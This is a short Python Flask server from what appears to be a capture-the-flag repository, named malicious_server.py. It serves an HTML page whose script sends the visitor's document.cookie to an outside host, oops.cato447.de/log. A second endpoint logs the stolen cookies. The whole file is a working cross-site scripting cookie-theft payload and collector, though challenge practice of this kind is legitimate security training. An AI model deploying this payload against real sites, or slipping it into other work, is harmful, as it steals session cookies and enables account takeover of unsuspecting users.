Files
ctf/catthegray25/ezpz/dist-oops/malicious_server.py
2025-06-01 01:29:56 +02:00

24 lines
413 B
Python

from flask import Flask, request
app = Flask(__name__)
@app.route("/log")
def log():
print(request.args.get("c"))
return "", 204
@app.route("/payload")
def payload():
print("Sending payload")
return """<!DOCTYPE html>
<html>
<body>
<script>
new Image().src = 'http://oops.cato447.de/log?c=' + document.cookie;
</script>
</body>
</html>"""
app.run(host="0.0.0.0", port=8025)